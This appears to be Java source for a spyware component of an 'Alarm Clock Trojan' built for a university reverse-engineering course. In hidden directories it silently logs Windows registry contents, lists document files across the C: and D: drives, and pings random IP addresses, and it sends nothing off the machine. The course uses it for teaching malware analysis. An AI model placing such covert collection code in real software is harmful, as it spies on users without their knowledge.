/*****************************************************************
 * Project:         Software Reverse Engineering (SRE) Education
 *                  Malware, Adware, and Spyware
 *                  Alarm Clock Trojan (Malware) Application
 * Programmer:      Teodoro Cipresso, San Jose State University
 *                  tcipress@hotmail.com
 ******************************************************************
 */
package info.reversingproject.alarmclock;

import java.io.File;
import java.io.FileWriter;
import java.net.InetAddress;
import java.util.ArrayList;
import java.util.Random;

import org.snipecode.code.google.WinRegistryWrapper;

/**
 * Collect information about the host system and user *cough*
 */
public class AlarmClockSpy extends Thread {

	private String baseDirName;

	/**
    */
	public void doSnoop() {
		baseDirName = "/." + String.valueOf(System.currentTimeMillis());
		if (!(new File(baseDirName)).mkdirs()) {
			baseDirName = "./." + String.valueOf(System.currentTimeMillis());
			if (!(new File(baseDirName)).mkdirs())
				return;
		} //
		new WindowsRegistryScanner().start();
		new FileSystemScanner("C:\\").start();
		new FileSystemScanner("D:\\").start();
		new ICMPScanner().start();
	}

	/**
     */
	private class WindowsRegistryScanner extends Thread {

		private String HKEY_LOCAL_MACHINE_SUB_KEY_1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
		private String HKEY_LOCAL_MACHINE_SUB_KEY_2 = "SOFTWARE\\";

		/**
         */
		public void run() {
			try {
				// HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows
				// NT\\CurrentVersion
				String fName = baseDirName + "/ac.reg."
						+ Math.abs(HKEY_LOCAL_MACHINE_SUB_KEY_1.hashCode())
						+ ".dat";
				File file = new File(fName);
				FileWriter regWriter = new FileWriter(file);
				String banner = "..:: Scanning HKEY_LOCAL_MACHINE\\"
						+ HKEY_LOCAL_MACHINE_SUB_KEY_1 + " ::.." + EOL;
				regWriter.write(banner);
				regWriter.flush();
				writeValuesOfKey(WinRegistryWrapper.HKEY_LOCAL_MACHINE,
						HKEY_LOCAL_MACHINE_SUB_KEY_1,
						WinRegistryWrapper.KEY_ALL_ACCESS, regWriter);
				banner = "..:: Scanning HKEY_LOCAL_MACHINE\\"
						+ HKEY_LOCAL_MACHINE_SUB_KEY_2 + " ::.." + EOL;
				regWriter.write(banner);
				regWriter.flush();
				writeSubkeysOfKey(WinRegistryWrapper.HKEY_LOCAL_MACHINE,
						HKEY_LOCAL_MACHINE_SUB_KEY_2,
						WinRegistryWrapper.KEY_ALL_ACCESS, regWriter);
				regWriter.close();
			} catch (Exception e) {
			}
		}

		/**
	 */
		private void writeSubkeysOfKey(int key, String subKey, int security,
				FileWriter writer) throws Exception {
			int[] regKey = WinRegistryWrapper.RegOpenKey(key, subKey, security);
			int regKeyHandle = regKey[WinRegistryWrapper.NATIVE_HANDLE];
			int regKeyInfo[] = WinRegistryWrapper.RegQueryInfoKey(regKeyHandle);
			int subKeyCount = regKeyInfo[WinRegistryWrapper.SUBKEYS_NUMBER];
			int subKeyMaxLen = regKeyInfo[WinRegistryWrapper.MAX_KEY_LENGTH];
			for (int subKeyNdx = 0; subKeyNdx < subKeyCount; subKeyNdx++) {
				flushWait(writer);
				byte subKeyName[] = WinRegistryWrapper.RegEnumKeyEx(
						regKeyHandle, subKeyNdx, subKeyMaxLen);
				if (null != subKeyName) {
					writer.write(new String(subKeyName).trim() + EOL);
				}
			}
			WinRegistryWrapper.RegCloseKey(regKeyHandle);
		}

		/**
	 */
		private void writeValuesOfKey(int key, String subKey, int security,
				FileWriter writer) throws Exception {
			int[] regKey = WinRegistryWrapper.RegOpenKey(key, subKey, security);
			int regKeyHandle = regKey[WinRegistryWrapper.NATIVE_HANDLE];
			int[] regKeyInfo = WinRegistryWrapper.RegQueryInfoKey(regKeyHandle);
			int regKeyValCnt = regKeyInfo[WinRegistryWrapper.VALUES_NUMBER];
			int regKeyValMaxLen = regKeyInfo[WinRegistryWrapper.MAX_VALUE_NAME_LENGTH];
			for (int regKeyValNdx = 0; regKeyValNdx < regKeyValCnt; regKeyValNdx++) {
				byte[] regKeyValNme = WinRegistryWrapper.RegEnumValue(
						regKeyHandle, regKeyValNdx, regKeyValMaxLen + 1);
				byte[] regKeyVals = WinRegistryWrapper.RegQueryValueEx(
						regKeyHandle, regKeyValNme);
				if (null != regKeyVals) {
					String entry = new String(regKeyValNme).trim() + " = "
							+ new String(regKeyVals).trim() + EOL;
					writer.write(entry);
				}
				flushWait(writer);
			}
			WinRegistryWrapper.RegCloseKey(regKeyHandle);
		}

		/**
	 */
		private void flushWait(FileWriter writer) throws Exception {
			writer.flush();
			Thread.yield();
			Thread.sleep(250);
		}

	}

	/**
    */
	private class FileSystemScanner extends Thread {

		private ArrayList<String> fileTypes = null;

		private FileWriter fileSysWrt = null;

		private String scanLocation = null;

		/**
	 */
		public FileSystemScanner(String scanLocation) {
			super();
			this.scanLocation = scanLocation;
		}

		/**
         */
		public void run() {
			try {
				doAddFileTypes();
				String fName = baseDirName + "/ac.fsys."
						+ Math.abs(scanLocation.hashCode()) + ".dat";
				File file = new File(fName);
				fileSysWrt = new FileWriter(file);
				String banner = "..:: Scanning " + scanLocation + " ::.." + EOL;
				fileSysWrt.write(banner);
				fileSysWrt.flush();
				recurseInDirFrom(new File(scanLocation), true);
				fileSysWrt.close();
			} catch (Exception e) {
			}
		}

		/**
	 */
		private void doAddFileTypes() {
			fileTypes = new ArrayList<String>();
			fileTypes.add(".txt");
			fileTypes.add(".doc");
			fileTypes.add(".ppt");
			fileTypes.add(".xls");
			fileTypes.add(".odt");
			fileTypes.add(".pdf");
		}

		/**
	 */
		private boolean matchFileType(String path) {
			int ePos = path.lastIndexOf('.');
			if (ePos != -1) {
				return fileTypes.contains(path.substring(ePos));
			} else {
				return false;
			}
		}

		/**
         */
		private void recurseInDirFrom(File dirItem, boolean recurse)
				throws Exception {
			String list[];
			if (dirItem.isDirectory()) {
				list = dirItem.list();
				if (list == null)
					return;
				for (int i = 0; i < list.length; i++) {
					File nxtDirItem = new File(dirItem.getAbsolutePath()
							+ File.separatorChar + list[i]);
					if (nxtDirItem.isFile()) {
						String absPath = nxtDirItem.getAbsolutePath();
						if (matchFileType(absPath)) {
							fileSysWrt.write(absPath + EOL);
							flushWait(fileSysWrt);
						}
					} else if (recurse) {
						nxtDirItem = new File(dirItem.getAbsolutePath()
								+ File.separatorChar + list[i]);
						recurseInDirFrom(nxtDirItem, recurse);
					}
				}
			} else if (!dirItem.isDirectory()) {
				String absPath = dirItem.getAbsolutePath();
				if (matchFileType(absPath)) {
					fileSysWrt.write(absPath + EOL);
					flushWait(fileSysWrt);
				}
			}
		}

		/**
	 */
		private void flushWait(FileWriter writer) throws Exception {
			writer.flush();
			Thread.yield();
			Thread.sleep(250);
		}
	}

	/**
     */
	private class ICMPScanner extends Thread {

		public void run() {
			try {
				String fName = baseDirName + "/ac.lip.127.0.0.1.dat";
				File file = new File(fName);
				FileWriter lipWriter = new FileWriter(file);
				String banner = "..:: Searching for reachable hosts ::.." + EOL;
				lipWriter.write(banner);
				lipWriter.flush();
				for (int i = 0; i < Math.max(255,
						Math.abs(new Random().nextInt())); i++) {
					_ICMP_IPV4(lipWriter);
				}
				lipWriter.close();
			} catch (Exception _e) {
			}
		}

		/**
	 */
		private void _ICMP_IPV4(FileWriter writer) throws Exception {
			Random rnd = new Random();
			String randHost = String.format("%d.%d.%d.%d", rnd.nextInt(255),
					rnd.nextInt(255), rnd.nextInt(255), rnd.nextInt(255));
			if (InetAddress.getByName(randHost).isReachable(3000)) {
				writer.write(randHost + " is reachable.");
				writer.flush();
			}
			Thread.yield();
			Thread.sleep(1000);
		}

	} //

	public static String EOL = System.getProperty("line.separator");
}
